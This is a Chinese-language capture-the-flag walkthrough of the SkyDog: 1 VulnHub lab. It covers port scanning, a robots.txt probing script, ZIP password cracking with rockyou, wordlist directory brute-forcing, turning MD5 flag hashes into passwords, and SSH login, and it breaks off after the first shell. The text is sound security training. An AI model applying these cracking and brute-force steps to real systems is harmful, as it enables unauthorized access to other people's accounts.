VulnHub-SkyDog: 1

靶机地址:https://www.vulnhub.com/entry/skydog-1,142/

目标:The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services.

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag #5 Another Day at the Office

Flag #6 Little Black Box

一、服务发现

nmap -sT -T4 -A -v 192.168.0.6

  • -sS/sT/sA/sW/sM:TCP SYN/Connect()/ACK/Window/Maimon扫描

  • -T<0-5>:设置计时模板(越高越快)

  • -A:启用操作系统检测、版本检测、脚本扫描和traceroute

  • -v:增加详细程度(使用-vv或更多效果)

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 09:11 CST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating ARP Ping Scan at 09:11
Scanning 192.168.0.6 [1 port]
Completed ARP Ping Scan at 09:11, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:11
Completed Parallel DNS resolution of 1 host. at 09:11, 0.30s elapsed
Initiating Connect Scan at 09:11
Scanning 192.168.0.6 [1000 ports]
Discovered open port 80/tcp on 192.168.0.6
Discovered open port 22/tcp on 192.168.0.6
Completed Connect Scan at 09:11, 0.05s elapsed (1000 total ports)
Initiating Service scan at 09:11
Scanning 2 services on 192.168.0.6
Completed Service scan at 09:11, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.6
NSE: Script scanning 192.168.0.6.
Initiating NSE at 09:11
Completed NSE at 09:11, 0.20s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Nmap scan report for 192.168.0.6
Host is up (0.00077s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 c8f75b338a5a0c03bb6baf2da970d301 (DSA)
|   2048 019fdd98babede224a484bbe8d1a47f4 (RSA)
|   256 f8a965a57c501dfd715792388bee8c0a (ECDSA)
|_  256 1deb574ab62366f0e7d5bb8d1ed7de23 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp 
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl 
|_/addurl/image? /mail/ /pagead/
MAC Address: 00:0C:29:75:50:BC (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.039 days (since Wed May 31 08:15:10 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.0.6

NSE: Script Post-scanning.
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Initiating NSE at 09:11
Completed NSE at 09:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds
           Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

在 22 端口上有一个 SSH 服务,在 80 端口上有一个 Web 服务。

简要检查了SSH,但目前没有任何有价值的东西。

二、80端口

通过 nmap 可以看到有一个“robots.txt”文件。

/search
/sdch
/groups
/catalogs
/catalogues
/news
/nwshp
/setnewsprefs?
/index.html?
/?
/?hl=*&
/?hl=*&*&gws_rd=ssl
/addurl/image?
/mail/
/pagead/

三、登陆页面

页面上有一张 JPG图片。

下载图片后,使用exiftool来检查图片信息。

exiftool SkyDogCon_CTF.jpg

┌──(root㉿kali)-[~]
└─# exiftool SkyDogCon_CTF.jpg
ExifTool Version Number         : 12.55
File Name                       : SkyDogCon_CTF.jpg
Directory                       : .
File Size                       : 85 kB
File Modification Date/Time     : 2023:05:29 15:23:01+08:00
File Access Date/Time           : 2023:05:31 08:05:06+08:00
File Inode Change Date/Time     : 2023:05:31 08:04:39+08:00
File Permissions                : -rw-------
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Exif Byte Order                 : Big-endian (Motorola, MM)
Software                        : Adobe ImageReady
XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding                         : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 900
Image Height                    : 525
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 900x525
Megapixels                      : 0.472

在XP注释字段中,得到了第一个标志。

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

flag{abc40a2d4e023b42bd1ff04891549ae2}

接下来开始查看“robots.txt”文件中列出的目录。

四、robots.txt

为了完整,使用手动获取“robots.txt”文件。

# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}
#
User-agent:*
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Allow: /newsalerts
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$
Disallow: /addurl/image?
Allow:    /mail/help/
Disallow: /mail/
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow:    /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disallow: /imode/?
Disallow: /imode/search?
Disallow: /jsky?
Disallow: /jsky/?
Disallow: /jsky/search?
Disallow: /pda?
Disallow: /pda/?
Disallow: /pda/search?
Disallow: /sprint_xhtml
Disallow: /sprint_wml
Disallow: /pqa
Disallow: /palm
Disallow: /gwt/
Disallow: /purchases
Disallow: /bsd?
Disallow: /linux?
Disallow: /mac?
Disallow: /microsoft?
Disallow: /unclesam?
Disallow: /answers/search?q=
Disallow: /local?
Disallow: /local_url
Disallow: /shihui?
Disallow: /shihui/
Disallow: /froogle?
Disallow: /products?
Disallow: /froogle_
Disallow: /product_
Disallow: /products_
Disallow: /products;
Disallow: /print
Disallow: /books/
Disallow: /bkshp?*q=*
Disallow: /books?*q=*
Disallow: /books?*output=*
Disallow: /books?*pg=*
Disallow: /books?*jtp=*
Disallow: /books?*jscmd=*
Disallow: /books?*buy=*
Disallow: /books?*zoom=*
Allow: /books?*q=related:*
Allow: /books?*q=editions:*
Allow: /books?*q=subject:*
Allow: /books/about
Allow: /booksrightsholders
Allow: /books?*zoom=1*
Allow: /books?*zoom=5*
Disallow: /ebooks/
Disallow: /ebooks?*q=*
Disallow: /ebooks?*output=*
Disallow: /ebooks?*pg=*
Disallow: /ebooks?*jscmd=*
Disallow: /ebooks?*buy=*
Disallow: /ebooks?*zoom=*
Allow: /ebooks?*q=related:*
Allow: /ebooks?*q=editions:*
Allow: /ebooks?*q=subject:*
Allow: /ebooks?*zoom=1*
Allow: /ebooks?*zoom=5*
Disallow: /patents?
Disallow: /patents/download/
Disallow: /patents/pdf/
Disallow: /patents/related/
Disallow: /scholar
Disallow: /citations?
Allow: /citations?user=
Disallow: /citations?*cstart=
Allow: /citations?view_op=new_profile
Allow: /citations?view_op=top_venues
Disallow: /complete
Disallow: /s?
Disallow: /sponsoredlinks
Disallow: /videosearch?
Disallow: /videopreview?
Disallow: /videoprograminfo?
Allow: /maps?*output=classic*
Allow: /maps/api/js?
Allow: /maps/d/
Disallow: /maps?
Disallow: /mapstt?
Disallow: /mapslt?
Disallow: /maps/stk/
Disallow: /maps/br?
Disallow: /mapabcpoi?
Disallow: /maphp?
Disallow: /mapprint?
Disallow: /maps/api/js/
Disallow: /maps/api/staticmap?
Disallow: /mld?
Disallow: /staticmap?
Disallow: /places/
Allow: /places/$
Allow: /Setec/
Disallow: /maps/preview
Disallow: /maps/place
Disallow: /help/maps/streetview/partners/welcome/
Disallow: /help/maps/indoormaps/partners/
Disallow: /lochp?
Disallow: /center
Disallow: /ie?
Disallow: /sms/demo?
Disallow: /katrina?
Disallow: /blogsearch?
Disallow: /blogsearch/
Disallow: /blogsearch_feeds
Disallow: /advanced_blog_search
Disallow: /uds/
Disallow: /chart?
Disallow: /transit?
Disallow: /mbd?
Disallow: /extern_js/
Disallow: /xjs/
Disallow: /calendar/feeds/
Disallow: /calendar/ical/
Disallow: /cl2/feeds/
Disallow: /cl2/ical/
Disallow: /coop/directory
Disallow: /coop/manage
Disallow: /trends?
Disallow: /trends/music?
Disallow: /trends/hottrends?
Disallow: /trends/viz?
Disallow: /trends/embed.js?
Disallow: /trends/fetchComponent?
Disallow: /notebook/search?
Disallow: /musica
Disallow: /musicad
Disallow: /musicas
Disallow: /musicl
Disallow: /musics
Disallow: /musicsearch
Disallow: /musicsp
Disallow: /musiclp
Disallow: /browsersync
Disallow: /call
Disallow: /archivesearch?
Disallow: /archivesearch/url
Disallow: /archivesearch/advanced_search
Disallow: /base/reportbadoffer
Disallow: /urchin_test/
Disallow: /movies?
Disallow: /codesearch?
Disallow: /codesearch/feeds/search?
Disallow: /wapsearch?
Disallow: /reviews/search?
Disallow: /orkut/albums
Allow: /jsapi
Disallow: /views?
Disallow: /c/
Disallow: /cbk
Allow: /cbk?output=tile&cb_client=maps_sv
Disallow: /recharge/dashboard/car
Disallow: /recharge/dashboard/static/
Disallow: /translate_a/
Disallow: /translate_c
Disallow: /translate_f
Disallow: /translate_static/
Disallow: /translate_suggestion
Disallow: /profiles/me
Allow: /profiles
Disallow: /s2/profiles/me
Allow: /s2/profiles
Allow: /s2/oz
Allow: /s2/photos
Allow: /s2/search/social
Allow: /s2/static
Disallow: /s2
Disallow: /transconsole/portal/
Disallow: /gcc/
Disallow: /aclk
Disallow: /cse?
Disallow: /cse/home
Disallow: /cse/panel
Disallow: /cse/manage
Disallow: /tbproxy/
Disallow: /imesync/
Disallow: /shenghuo/search?
Disallow: /support/forum/search?
Disallow: /reviews/polls/
Disallow: /hosted/images/
Disallow: /ppob/?
Disallow: /ppob?
Disallow: /adwordsresellers
Disallow: /accounts/ClientLogin
Disallow: /accounts/ClientAuth
Disallow: /accounts/o8
Allow: /accounts/o8/id
Disallow: /topicsearch?q=
Disallow: /xfx7/
Disallow: /squared/api
Disallow: /squared/search
Disallow: /squared/table
Disallow: /toolkit/
Allow: /toolkit/*.html
Disallow: /globalmarketfinder/
Allow: /globalmarketfinder/*.html
Disallow: /qnasearch?
Disallow: /app/updates
Disallow: /sidewiki/entry/
Disallow: /quality_form?
Disallow: /labs/popgadget/search
Disallow: /buzz/post
Disallow: /compressiontest/
Disallow: /analytics/reporting/
Disallow: /analytics/admin/
Disallow: /analytics/web/
Disallow: /analytics/feeds/
Disallow: /analytics/settings/
Allow: /alerts/manage
Allow: /alerts/remove
Disallow: /alerts/
Allow: /alerts/$
Disallow: /ads/search?
Disallow: /ads/plan/action_plan?
Disallow: /ads/plan/api/
Disallow: /ads/hotels/partners
Disallow: /phone/compare/?
Disallow: /travel/clk
Disallow: /hotelfinder/rpc
Disallow: /hotels/rpc
Disallow: /flights/rpc
Disallow: /commercesearch/services/
Disallow: /evaluation/
Disallow: /chrome/browser/mobile/tour
Disallow: /compare/*/apply*
Disallow: /forms/perks/
Disallow: /baraza/*/search
Disallow: /baraza/*/report
Disallow: /shopping/suppliers/search
Disallow: /ct/
Disallow: /edu/cs4hs/
Disallow: /trustedstores/s/
Disallow: /trustedstores/tm2
Disallow: /trustedstores/verify
Disallow: /adwords/proposal
Disallow: /shopping/product/
Disallow: /shopping/seller
Disallow: /shopping/reviewer
Disallow: /about/careers/apply/
Disallow: /about/careers/applications/
Disallow: /landing/signout.html
Disallow: /webmasters/sitemaps/ping?
Disallow: /ping?
Allow: /gb/images
Allow: /gb/js
Disallow: /gallery/

实际上在“robots.txt”中的目录比nmap最初扫到的要多得多。而且,发现flag2!

Flag #2 When do Androids Learn to Walk?

flag{cd4f10fcba234f0e8b2f60a490c306e6}

“robots.txt”文件记录了更多的目录信息。使用 Python 脚本来解析“robots.txt”文件,并测试其中定义的每个 URL。

import requests

lines = tuple(open('robots.txt', 'r'))

for line in lines:
        if line[0] != '#' and line[0].strip() != '':
                lineSplit = line.split(': ')
                if lineSplit[0].lower() == 'allow' or lineSplit[0].lower() == 'disallow':
                        targetUrl = 'http://192.168.57.101%s' % lineSplit[1].strip()
                        r = requests.get(targetUrl)
                        if r.status_code != 404:
                                print targetUrl

执行 extract-robots.py 脚本

python2 extract-robots.py

┌──(root㉿kali)-[~]
└─# python2 extract-robots.py
http://192.168.0.6/index.html?
http://192.168.0.6/?
http://192.168.0.6/?hl=
http://192.168.0.6/?hl=*&
http://192.168.0.6/?hl=*&gws_rd=ssl$
http://192.168.0.6/?hl=*&*&gws_rd=ssl
http://192.168.0.6/?gws_rd=ssl$
http://192.168.0.6/?pt1=true$
http://192.168.0.6/Setec/

经过尝试后,有一个真实的URL可以从“robots.txt”文件中的“/Setec”进行检查

五、/Setec/

打开 URL 后查看源码。

<html>
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
<!-- 
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);
pageTracker._trackPageview();
} catch(err) {}</script>
--> 
</html>

页面有一个JPG,注释掉的页面跟踪器中有一个提示(“NSA-Agent-Abbott”;又名达斯维达)。图像中没有任何有价值的信息。

六、/Setec/Astronomy/

请求Astronomy目录后得到一个目录列表。

Index of /Setec/Astronomy
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[IMG]	Setec_Astronomy.jpg	2015-09-18 16:34 	167K	 
[ ]	Whistler.zip	2015-09-18 16:59 	488 	 
Apache/2.4.7 (Ubuntu) Server at 192.168.0.6 Port 80

下载 ZIP 并查看。

unzip -l Whistler.zip

unzip Whistler.zip

┌──(root㉿kali)-[~]
└─# unzip -l Whistler.zip
Archive:  Whistler.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
       38  2015-09-19 04:58   flag.txt
       61  2015-09-19 04:29   QuesttoFindCosmo.txt
---------                     -------
       99                     2 files
┌──(root㉿kali)-[~]
└─# unzip Whistler.zip
Archive:  Whistler.zip
[Whistler.zip] flag.txt password:

ZIP 文件已加密。使用“fcrackzip”并根据“rockyou”字典的密码测试ZIP。

fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt Whistler.zip

┌──(root㉿kali)-[~]
└─# fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt Whistler.zip
found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)


PASSWORD FOUND!!!!: pw == yourmother

解压缩 ZIP 文件后,查看两个文件的内容。

unzip Whistler.zip

echo $(cat flag.txt)

echo $(cat QuesttoFindCosmo.txt)

┌──(root㉿kali)-[~]
└─# unzip Whistler.zip
Archive:  Whistler.zip
[Whistler.zip] flag.txt password: 
 extracting: flag.txt                
  inflating: QuesttoFindCosmo.txt    

┌──(root㉿kali)-[~]
└─# echo $(cat flag.txt)
flag{1871a3c1da602bf471d3d76cc60cdb9b}

┌──(root㉿kali)-[~]
└─# echo $(cat QuesttoFindCosmo.txt)
Time to break out those binoculars and start doing some OSINT

得到了另一个flag。

Flag #3 Who Can You Trust?

flag{1871a3c1da602bf471d3d76cc60cdb9b}

七、OSINT

在flag3中提示 OSINT。

OSINT(开放源情报)是指收集、分析和利用来自公共来源的信息以获取有价值的情报。

到目前为止,唯一有用的是“/Setec/”页面的“NSA Agent Abbott”。搜索之后发现了一部名为“Sneakers”的电影。

  1. 在这个角色的引号下,提到了另一个名叫“Whistler”的角色。在维基百科的电影条目下,还提到了一个名为“Cosmo”的角色。

  2. "NSA-Agent-Abbott"; AKA Darth Vader是“/Setec/”页面的来源之一。这似乎是对演员 James Earl Jones的引用,他既在《Star Wars》系列中为Darth Vader配音,又在《Sneakers》中扮演国家安全局特工Bernard Abbott的角色。

  3. 最后一个参考在页面“/Setec/”的图像中。该图像包含“too many secrets”文字,这是电影 “Sneakers”中“Setec Astronomy”的字谜。

所以需要从电影剧本、相关媒体,尤其是演员James Earl Jones中收集相关信息。挖完之后能想出的只是剧本和琐事。

由于之前的“/Setec/”目录是根据电影中的一个术语命名的,所以收集一些名词并建立了一个单词列表用来爆破目录。

首先将IMDB文章中电影的所有文本复制到一个文件中去重排序,然后将此列表用作目录的单词列表。

得到的单词列表如下(dirb.txt):

 
|
-
10
11
1138
1138,
12
~12
"123".
13
15
16
17
18
19
1965
1970s,
1970s.
(1971).
(1974).
(1975)
(1984).
(1987)
(1987).
(1989)
1992
(1992).
(1993)
20
2012,
20th
21
22
23
3
30
34
4
5
6
7
8
9
a
A
"A")
(AAVS)
Abbott,
about
above
access
accesses
account
actor
actual
actually
added
addition
Adleman
Adleman'
Adleman',
Aerospace
AFB,
after
(after
age
Agent
Agent".
air
Air
airports.
airspace
Alden
"Aleka's
algorithm
algorithm,
alias
all
almost
also
Also,
Alto,
amount
an
anchor
and
anniversary
another
any
Apollo
appeared
appears,
applied
are
area
Area.
around
arrested
article
articles
as
As
assumed
astronauts
at
attempt
Attic",
attractions
Audiovisual
away
Axe
Aykroyd
Aykroyd,
Back
backdrop
Bad
"Bad,
band
bar
Base
Bay
be
bearing
because
before
beginning
being
below
Ben
bench)
Bernard
Bernardino,
Bestrop
Bestrop".
bike
billed
Bishop
Bishop,
black
Black
blind
"Blindfold",
blindfolded,
Bob
born
borrowed
box
box.
Box
box...there
Brandes
Brandes'
Brandes)
break
breaking
breakthrough
brief
broadcast
Brown
Brown"
building
bus
Busfield
by
CA
CA,
CA.
California."
called
calls
calls."
came
Campus
can't
"cap=dw".
"Cap'n
Captain
"Captain
cast
casting
casualties
CDC-6600,
chance
character
character,
characters
charismatic
Charlton
Chinese.
CIA
circular
clock
cocktail
code
codes"
co-inventors
college
College
commemorating
commonly
complexion
components
computer
computer,
computers
computing
Condor
Condor"
connections
considerable
constructing
consultant
control
Control
Conversation
convertible
Coolidge
Corporation
Cosmo
Cosmo.
Cosmo's
co-star
could
Craven
Cray
crayon
create
credits
Crunch"
Crunch".
"CRUNCH"
cryptic
cryptosystem,
currently
cut
Dan
data
Data
David
days
Days
deals
"[des]"
describe
designed
device
device.
did
digital
Dim
directed
director
Director
directors
discovered
discovers
displayed
displayed,
displays
divulge
dollar
done,
done".
Doris,
Doris.
down
dozens
Dr.
Draper
Draper)
Dreams
drive
driven
during
Earl
early-'90s
earpiece
effect,
(e.g.,
Embarcadero
encrypting
encryption
encryption,
end,
ends
Engineering.
English
Engressia,
entered
entries
episode
Ernie
E.T.
Evil."
except
exchange
expert
facade
Facebook
factoring
faked
famous
fastest
"Father
favor,
"FBI
fictional
Field
film
film,
film.
filmed
final
finale
first
Fish
Fisherman"
fitting
five
fixes
flashback)
folded
following
for
Force
form
formed
former
found
Francisco
free
"free
from
front
fun
Future
G,
gaggle
game
Garlington
geese
George
get
gets
getting
Ghia
gibberish
girl
give
giveaway/reference
giving
glasses
goes
graduated
graphics
group
groups
Groups
guard
guests
guidance
hackers,
had
Handoff"
hands
has
have
having
he
He
he'd
helped
her
(he's
he's
Heston
hidden
high
Hill
him
himself
Hip,
his
His
hit.
holds
Hoover
hosted.
how
However,
Hudson's
I
"I
idea
identified
if
impact
important
in
In
inanimate
included
includes
indeed
industry.
"information
Information
initial
instead
Institute
intentionally
interesting
Interesting?
internship
into
introduces
invented
is
isn't
it
item
its
it's
jacket
James
Janek
Janek's
Jaws.
Joe
John
(John
Jones
Jones,
Jones'
Juel
just
Karmann
kidnapped,
kidnappers
kids'
Kingsley
Kingsley;
Kingston,
known.
lake
landings.
later
lead
Lee
Len
Leroy
letters
like
likely
lines
list
little
Live
Liz
located
looked
looks
lot,
loves
lower
Lucas's
made
made.
Mafia
magazine
make
many
map
Married
Martin
Marty
Mary
Matewan
mathematical
mathematician
mathematicians
may
McDonnell
McDonnell.
meaningful.
meet
men
method
microphone
mid
Mike
"mnop=fred/14cb",
modeled
moon
more
most
Mother
movie
movie,
movie.
movie."
much
multi-million
(multi-user)
murdered
Murderer
musical
Myers
name
named
names
NASA
Natural
nature.
nearby.
needed
New
news
Night
Niskayuna,
No
nominees:
Norton
not
nothing
notion
observes
obsolete).
obvious
of
off
office
office,
often
oil
on
once
Once
one
(one
online
only
Ontario-based
operating
orange
original
Oscar
out
over
Palo
part
party
party.
pass
passed
Passion
password)
past
patterned
people
perfect
Permalink
person
Phil
phishing"
Phoenix,
Phoenix.
phone
"phone
photos
phreaker"
phreakers.
phreaking",
picking
piece
pitch
pizza.
plays
Playtronics
PlayTronics
"ploo",
plot
"Pocket
points.
Poitier
policy
political
Popeil/Ronco
popular
practice
praises
prank
predecessor
preeminent
prevent
previous
primitive
prison,
Producer/Director
producers
'Prof.
profanity
project
promotes.
provided
public-key
published
quality
rated
recalled
Redford
(Redford)
Redford,
Redford.
Redford's
reference
references
referred
reflected
regular
release.
remarked
remember
repeating
retraces
River
Robert
Robinson
Robinson,
Robinson's
Rock
Ron
roof
room
route
RSA
said,
same
San
sandwiches.
Saturday
saved
saw
Sayles.
says,
scene
scene)
Schenectady,
Scrabble
screen,
scribbles,
script.
SCRUNCHY).
seasoned
security
Security"
seen
series
served
Service
set
several
Share
shark
shooting
shown
Sidney
similar
singers
singing
Slate
slides
small
snapped
Sneakers
"Sneakers"
so
So
Social
some
song
song,
sound
sounds.
soundstage
source
"Special
spent
spewing
Spoilers
SRI
Stanford
Stanford's
starring
Stephen
Strathairn
Strathairn,
Studios
Subsequently,
subtle
such
Sum
supercomputer
switching-systems
symposium
system
tank
tech
technical
technology).
teeth
telephone
Television
tells
term
Tetrault
that
"that
that,
"that's
the
(the
The
("The
their
them
there
there."
There
These
they
They
think
thinks
this
this:
This
thought
three
Three
"Three
thriller
through
THX
time
time-sharing
Timothy
to
To
Tobolowsky
today.
together
took
totally
"Touch
tour
tourists
tower
traffic
Tragically
transposed
trash,
trilogy.
trivia
trouble
true
trying
t-shirt
T-shirt
turned
Twitter
two
"unbreakable
under
Union
Universal
unnoticed
until
up
upside
USAF
use
used
uses
using
Valley
van.
vehicle
version
versions
very
veterans
visible
Volkswagen
warehouse
was
watching
wears
well
Werner
(Werner
what
when
When
where
which
(which
while
While
whistle
Whistler
Whistler's
who
whom
wife
winners:
with
word
world
world.
worlds
would
WRGB
WRGB-TV
wrote
year.
Yes
Y-MP
Y-MP,
York.
younger

使用dirb工具爆破目录

dirb "http://192.168.0.6/" dirb.txt

┌──(root㉿kali)-[~]
└─# dirb "http://192.168.0.6/" dirb.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 31 10:42:30 2023
URL_BASE: http://192.168.0.6/
WORDLIST_FILES: dirb.txt

-----------------

GENERATED WORDS: 831                                                           

---- Scanning URL: http://192.168.0.6/ ----
==> DIRECTORY: http://192.168.0.6/PlayTronics/

---- Entering directory: http://192.168.0.6/PlayTronics/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed May 31 10:42:30 2023
DOWNLOADED: 831 - FOUND: 0

打开“/PlayTronics/flag.txt”获得第四个flag。

Flag #4 Who Doesn’t Love a Good Cocktail Party?

flag{c07908a705c22922e6d416e0e1107d99}

在目录中还有一个 pcap 文件。

八、内部流量

pcap文件似乎包含大量到Sound Cloud的HTTPS流量,以及托管相关资产的域的DNS查找。偶尔也会有使用 STP(生成树协议)的请求。

pcap的末尾是一个HTTP请求,用于下载MP3文件。

GET /8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1lZGlhLnNuZGNkbi5jb20vOFEzemJ0QnB4T0hiLjEyOC5tcDMiLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE0NDI1OTUwMDl9fX1dfQ__&Signature=YcIjOhLpPVrZXLO-WBktwm2ooBU4V1gQx8fazVm-cbyN8Y-NtqqOTeF9ENniPe5YOHqVMn8gWmGz~LeiAu1X4hvZkjiVZBCtSMPg6P9K54iZY2xQXwkmLM8BkgYaVkVB56Dt4F2UWbBNtZmXO5wM9qIp8Aazdbq0oIUWzGZ4GA37Rcb7ib0dIL-zXoDc~Qz2L9k4Mq-mixGesFRCbhEkW-JVkXnLxO-u3bIXVzHT7U9yprPQEGfykvzEXiXcU83u7fTo-jQOJeecfGfgdCJC3sCzExuZ8Lexz0nGvnl2-MlqWacDmad6e46g0tlEiu-l2JVnWKNd853mRFxON0Kgng__&Key-Pair-Id=APKAJAGZ7VMH2PFPW6UQ HTTP/1.1
Host: cf-media.sndcdn.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

这是从IP 54.239.172.25发送到IP 192.168.2.223的MP3文件。

保存MP3文件(文件-->导出对象-->HTTP-->保存)

听MP3可以辨认出“my name is”,“passport”和“verify”这两个词。不过听不出名字。搜索了一番之后,发现了另一个与电影 "Sneakers" 有关的引用,并将其与 YouTube 视频联系起来。代码段的全文如下。

这段文字描述了一个人听了多次 MP3 文件,成功识别出其中的一些单词,例如 "my name is"、"passport" 和 "verify"。然而,他并没有听清楚所提到的名字。通过一些谷歌搜索,他发现了另一个与电影 "Sneakers" 有关的引用,并将其与 YouTube 视频联系起来。

下面是该片段的完整文本:

Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me.

这是电影 "Sneakers" 中的一句著名台词,由角色 Martin Bishop(由罗伯特·雷德福饰演)说出。

得到了用户名 wernerbrandes 不知道密码,尝试使用字典暴力SSH登录无效。

九、OSINT

遇到了瓶颈,再次对前面的信息进行规整发现,flag貌似使用MD5加密,解密前面发现的flag。

abc40a2d4e023b42bd1ff04891549ae2
Welcome Home

cd4f10fcba234f0e8b2f60a490c306e6
Bots

1871a3c1da602bf471d3d76cc60cdb9b
yourmother

c07908a705c22922e6d416e0e1107d99
leroybrown

通过尝试,发现SSH口令

ssh wernerbrandes@192.168.0.6

  • 用户名:wernerbrandes

  • 密码:leroybrown

┌──(root㉿kali)-[~]
└─# ssh wernerbrandes@192.168.0.6
The authenticity of host '192.168.0.6 (192.168.0.6)' can't be established.
ED25519 key fingerprint is SHA256:gL0MLLMiTCxWwSsCshUwApwkQV/M15XfVkoe5A9dk2Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.6' (ED25519) to the list of known hosts.
wernerbrandes@192.168.0.6's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon May 29 11:10:36 EDT 2023

  System load: 0.64              Memory usage: 3%   Processes:       169
  Usage of /:  7.3% of 17.34GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

30 packages can be updated.
21 updates are security updates.

Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls -alh
total 32K
drwxr-xr-x 3 wernerbrandes wernerbrandes 4.0K Oct 30  2015 .
drwxr-xr-x 4 root          root          4.0K Sep 18  2015 ..
-rw------- 1 wernerbrandes wernerbrandes    0 Oct 30  2015 .bash_history
-rw-r--r-- 1 wernerbrandes wernerbrandes  220 Sep 18  2015 .bash_logout
-rw-r--r-- 1 wernerbrandes wernerbrandes 3.6K Sep 18  2015 .bashrc
drwx------ 2 wernerbrandes wernerbrandes 4.0K Sep 18  2015 .cache
